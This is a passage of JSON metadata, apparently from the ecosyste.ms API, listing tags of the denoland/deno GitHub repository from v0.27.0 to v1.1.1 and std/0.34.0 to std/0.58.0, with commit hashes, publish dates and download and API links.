and/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencie